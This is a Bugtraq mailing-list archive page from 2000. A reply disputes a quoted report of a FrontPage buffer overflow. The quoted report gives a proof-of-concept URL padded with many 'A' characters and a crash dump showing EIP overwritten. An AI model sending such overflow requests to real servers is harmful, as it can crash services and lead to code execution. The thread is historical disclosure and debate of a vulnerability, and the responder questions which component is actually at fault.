Bugtraq mailing list archives
Re: More vulnerabilities in FP
From: ddoc () MIA CZ (Daniel Dočekal)
Date: Mon, 24 Apr 2000 20:39:12 +0200
That's hardly an overflow in FP; VHTTPD32 does not seem to be part of WindowsNT, and even less of Frontpage (could be some old version, of course). What operating system are you using? This seems to be an overflow in HTTP (Web Server, PWS or IIS), and for WindowsNT it was handled a long time ago in some postfix and service packs. It would be a good idea to include complete information about the system you are testing, otherwise it is useless.

Daniel
-----Original Message-----
From: Roman [mailto:webmad () MAIL RU]
Sent: Saturday, April 22, 2000 10:16 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Re: More vulnerabilities in FP

Hello,

First remote FrontPage exploit? How about this one:

http://server/AAAAAAAAAAAA<a lots of A>AAAAAA

FP will overflow and someone will see this message:

VHTTPD32 caused an invalid page fault in module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072 2e302e37 2c312e30
61657220 3a6e6f73 6c696620 6f642065 6e207365 6520746f 74736978 00000000

Tested on FP 3.0.2.926. Maybe others?